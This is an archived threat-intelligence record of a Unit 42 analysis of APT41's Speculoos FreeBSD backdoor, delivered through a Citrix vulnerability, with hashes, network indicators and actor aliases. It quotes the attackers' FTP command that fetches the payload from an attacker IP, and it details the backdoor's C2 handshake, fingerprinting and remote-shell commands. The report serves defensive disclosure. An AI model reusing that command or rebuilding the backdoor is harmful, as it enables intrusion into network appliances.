{
	"id": "7d2c6700-4bd7-4b30-8333-4a478d97679b",
	"created_at": "2026-04-06T00:19:11.957979Z",
	"updated_at": "2026-04-10T13:11:42.6305Z",
	"deleted_at": null,
	"sha1_hash": "95f48ca2991eab6a83242c13de3780ea56007628",
	"title": "APT41 Using New Speculoos Backdoor to Target Organizations Globally",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 175503,
	"plain_text": "APT41 Using New Speculoos Backdoor to Target Organizations Globally\r\nBy Bryan Lee, Robert Falcone, Jen Miller-Osborn\r\nPublished: 2020-04-14 · Archived: 2026-04-05 17:43:12 UTC\r\nExecutive Summary\r\nOn March 25, 2020, FireEye published a research blog regarding a global attack campaign operated by an espionage-motivated adversary group known as APT41. This attack campaign was thought to have operated between January 20 and March 11, specifically targeting Citrix, Cisco, and Zoho network appliances via exploitation of recently disclosed vulnerabilities. Based on WildFire and AutoFocus data available to Unit 42, we were able to obtain samples of the payload targeting Citrix appliances, which were executables compiled to run on FreeBSD. We also used this data to identify multiple victims in industries such as healthcare, higher education, manufacturing, government and technology services in multiple regions around the world, such as North America, South America, and Europe.\r\nThis blog will be specific to the FreeBSD-based payload that we have named Speculoos. We identified a total of five samples from our dataset, all of which were approximately the same file size, but contain minute differences amongst the sample set. The subtle differences indicate that they likely originated from the same developer and were either recompiled or patched. As described by FireEye, Speculoos was delivered by exploiting CVE-2019-19781, a vulnerability affecting the Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliances that allowed an adversary to remotely execute arbitrary commands. This vulnerability was first disclosed on December 17, 2019 via security bulletin CTX267679, which contained several mitigation recommendations. By January 24, 2020, permanent patches for the affected appliances were issued. 
Based on the spread of industries and regions, in addition to the timing of the vulnerability disclosure, we believe this campaign may have been more opportunistic in nature compared to the highly targeted attack campaigns that are often associated with these types of adversaries. However, the exploitation of the vulnerability in conjunction with the delivery of a backdoor specifically designed to execute on the associated FreeBSD operating system indicates that the adversary was absolutely targeting the affected devices.\r\nPalo Alto Networks customers are protected from this threat. Our threat prevention platform with WildFire identifies this malware as malicious while simultaneously updating the ‘malware’ category within the PAN-DB URL filtering solution for malicious and/or compromised domains that have been identified. AutoFocus customers can continue to track Speculoos activity by using the Speculoos tag.\r\nAttack Details\r\nIn this attack campaign, the adversaries exploited CVE-2019-19781 to direct the victim appliances to retrieve Speculoos over FTP using the command /usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/\u003cfilename\u003e as reported by FireEye. Our data was consistent with this activity, with the first wave beginning on January 31, 2020 evening UTC to February 1, 2020 afternoon UTC using the filename bsd. This wave affected multiple higher education organizations in the United States, a healthcare organization in the United States, and a consulting firm in Ireland. A second wave began on February 24, 2020 morning UTC through February 24, 2020 after midnight UTC, this time using the filename un. 
This wave affected a higher education organization in Colombia, a manufacturing organization in Austria, a higher education organization targeted in the first wave in the United States, and a state government in the United States. While the data Unit 42 has access to is not exhaustive, the spread of victims we do have data on appears to indicate that this attack campaign may have been more of an opportunistic push by APT41 to gain footholds in a large number of organizations with minimal effort to expand their attack infrastructure.\r\nThe deployment of a tool to run specifically on FreeBSD is fairly novel. Malware targeting BSD-based systems is relatively rare, and considering the use of this tool in conjunction with a vulnerability affecting specific Citrix network appliances, it is highly likely Speculoos was specifically crafted for this attack campaign by APT41.\r\nBinary Analysis\r\nThe Speculoos backdoor is an ELF executable compiled with GCC 4.2.1 to run on a FreeBSD system. This payload does not appear to natively be able to maintain persistence, so it is likely it requires the adversary to use a separate component or additional step to maintain their foothold. Upon execution, the payload enters a loop that calls a function to communicate with the following command and control (C2) domain over TCP/443:\r\nalibaba.zzux[.]com (resolving to 119.28.139[.]120)\r\nIf it is unable to communicate with the domain above, Speculoos will attempt to use a backup C2 at 119.28.139[.]20, also over TCP/443. If it is able to connect to either C2 server, it will carry out a TLS handshake with the server using the hardcoded buffer in the binary, which is used as the first packet in the handshake. 
Before sending the hardcoded buffer to the C2 server, Speculoos modifies offset 11 with the current time and offset 15 with 28 pseudorandom bytes generated by iterating through the domain string, adding the current time and then using XOR on each byte with 7 multiplied by the byte's offset as a key. Figure 1 shows the hardcoded buffer before Speculoos modifies and sends it to the C2 server.\r\n16 03 01 00 B5 01 00 00 B1 03 01 00 00 00 00 00 ................\r\n00 00 00 00 00 6A CE 14 27 3F 24 92 AB 0A A3 F7 .....j..'?$.....\r\nDB 21 1C D6 7F FD E3 A3 50 00 00 00 00 48 C0 0A .............H..\r\nC0 14 00 88 00 87 00 39 00 38 C0 0F C0 05 00 84 .......9.8......\r\n00 35 C0 07 C0 09 C0 11 C0 13 00 45 00 44 00 66 .5.........E.D.f\r\n00 33 00 32 C0 0C C0 0E C0 02 C0 04 00 96 00 41 .3.2...........A\r\n00 04 00 05 00 2F C0 08 C0 12 00 16 00 13 C0 0D ...../..........\r\nC0 03 FE FF 00 0A 02 01 00 00 3F 00 00 00 13 00 ..........?.....\r\n11 00 00 0E 6C 6F 67 69 6E 2E 6C 69 76 65 2E 63 ....login.live.c\r\n6F 6D FF 01 00 01 00 00 0A 00 08 00 06 00 17 00 om..............\r\n18 00 19 00 0B 00 02 01 00 00 23 00 00 33 74 00 ..........#..3t.\r\n00 00 05 00 05 01 00 00 00 00  ..........\r\nFigure 1. Hardcoded buffer used as the TLS Client Hello packet sent to the C2 server\r\nFigure 1 suggests that this is a handshake packet for TLS 1.0, specifically the Client Hello. 
The most interesting part of this Client Hello packet is that it is requesting login.live[.]com as the Server Name Indication (SNI), which suggests that the author may try to make the handshake look innocuous, as seen in Figure 2.\r\nFigure 2. Client Hello packet in the TLS handshake uses login.live.com as the Server Name Indication\r\nAfter successfully connecting to the C2 and completing the TLS handshake, Speculoos will perform an initial system enumeration to fingerprint the victim system, then send the data back to the C2 server. The buffer used to store the information will be 1048 bytes and will be structured as seen in Table 1 below.\r\nOffset Description Notes\r\n0 Identifier Hardcoded string “freebsd”\r\n64 Unknown Hardcoded “5”\r\n68 Username Uses ‘getuid’ to get user of process, then ‘getpwuid.pw_name’ to get the name\r\n132 MAC addresses Uses if_nameindex to iterate through interfaces\r\n152 OS version Results of ‘uname -v’\r\n216 Hostname Results of ‘uname -s’ or ‘hostname’\r\n280 Disk space Enumerates file systems at ‘/’ and ‘/private/var’\r\n904 Physical memory Sysctl hw.physmem\r\n908 User memory Sysctl hw.usermem\r\n912 Number of CPUs Sysctl hw.ncpu\r\n916 CPU speed Sysctl machdep.tsc_freq/1000000\r\n920 CPU model Sysctl hw.model\r\nTable 1. Structure used to transmit gathered system information to the C2\r\nThe data is sent over the TLS channel and two bytes of data are expected in response by Speculoos. After a successful response, it will then send a single byte (0xa) to the C2 and enter a loop to begin receiving commands. The commands in Table 2 are then made available for the adversary to execute on the victim system. 
The commands available to Speculoos indicate that this tool is a fully functional backdoor which gives the adversary full control over the victim system.\r\nCommand Sub-command Description\r\n0x1E Creates shell related sub-command handler\r\nw (0x77) Creates a remote shell by forking off a “/bin/sh” process and redirects standard input, output and error to the TLS socket\r\nf (0x66) Creates disk related sub-command handler\r\nf (0x66) Remove File (unlink function)\r\nk (0x6B) Remove Directory (rm -rf \"\u003cpath\u003e\")\r\ne (0x65) Run specified file (execv)\r\ng (0x67) Download file\r\ni (0x69) Upload file\r\n0x14 Enumerate Processes (Name, PID, PPID, Threads)\r\n0x15 Kill process\r\n0x1 List Folder Contents\r\n! (0x21) Execute command using “sh -c”\r\nTable 2. Commands in Speculoos’s command handler\r\nThe two Speculoos samples we analyzed were functionally identical, with only eight bytes differing between the two. This eight-byte change was caused by the author replacing the uname -s command with the hostname command when gathering system information. It is unclear why the command may have been changed, as they return different results. uname -s will return the kernel information, which would be the string FreeBSD on a FreeBSD system, while hostname would print the name of the host system. Figure 3 shows a binary comparison between the two Speculoos samples we analyzed, highlighting the eight-byte difference.\r\nFigure 3. Binary comparison between two Speculoos samples showing different commands used to gather the hostname of the system\r\nImpact Assessment\r\nVulnerabilities that allow for remote code execution by unauthorized users are nearly always a potentially high impact security issue, especially if they affect systems that are public-facing. 
In this case, CVE-2019-19781 affected multiple appliances that may be public-facing, and had a highly motivated adversary actively exploiting the vulnerability to install a custom backdoor. Considering the types of appliances that were affected, it is critical that any organization that may be affected take mitigation actions immediately. Because all or a significant amount of network activity must traverse these compromised network appliances, adversaries can more easily monitor or modify an entire organization’s network activity instead of being relegated to a single device or a handful of devices.\r\nIn addition, because by default these appliances have access to a large number of organizational systems, lateral movement becomes far less of a challenge. The adversaries may attempt to directly traverse into other hosts whose traffic must pass through the compromised appliances, or even be able to modify network traffic to perform additional malicious actions, such as injecting/delivering malicious code, executing man-in-the-middle attacks, or redirecting users to adversary-owned login pages to harvest credentials. 
Lastly, due to the nature of appliances, detection of these attacks may be significantly more challenging, as generally they are black-box type solutions which are not often interacted with or inspected for anomalous activity, unless an issue arises.\r\nPalo Alto Networks customers may be protected by:\r\nDeploying Threat ID 57625, 57570, and 57497\r\nWildFire properly classifies Speculoos as malicious\r\nC2 domain has been classified as malicious in DNS Security\r\nAutoFocus customers may learn more via the Speculoos tag\r\nIndicators of Compromise\r\nAnalyzed Speculoos SHA256\r\n99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28\r\n6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167\r\nAdditional Speculoos SHA256\r\n493574e9b1cc618b1a967ba9dabec474bb239777a3d81c11e49e7bb9c71c0c4e\r\n85297097f6dbe8a52974a43016425d4adaa61f3bdb5fcdd186bfda2255d56b3d\r\nc2a88cc3418b488d212b36172b089b0d329fa6e4a094583b757fdd3c5398efe1\r\nNetwork Indicators\r\n119.28.139[.]20\r\nalibaba.zzux[.]com\r\n119.28.139[.]120\r\n66.42.98[.]220\r\nexchange.longmusic[.]com\r\nSource: https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/"
	],
	"report_names": [
		"apt41-using-new-speculoos-backdoor-to-target-organizations-globally"
	],
	"threat_actors": [
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434751,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/95f48ca2991eab6a83242c13de3780ea56007628.pdf",
		"text": "https://archive.orkl.eu/95f48ca2991eab6a83242c13de3780ea56007628.txt",
		"img": "https://archive.orkl.eu/95f48ca2991eab6a83242c13de3780ea56007628.jpg"
	}
}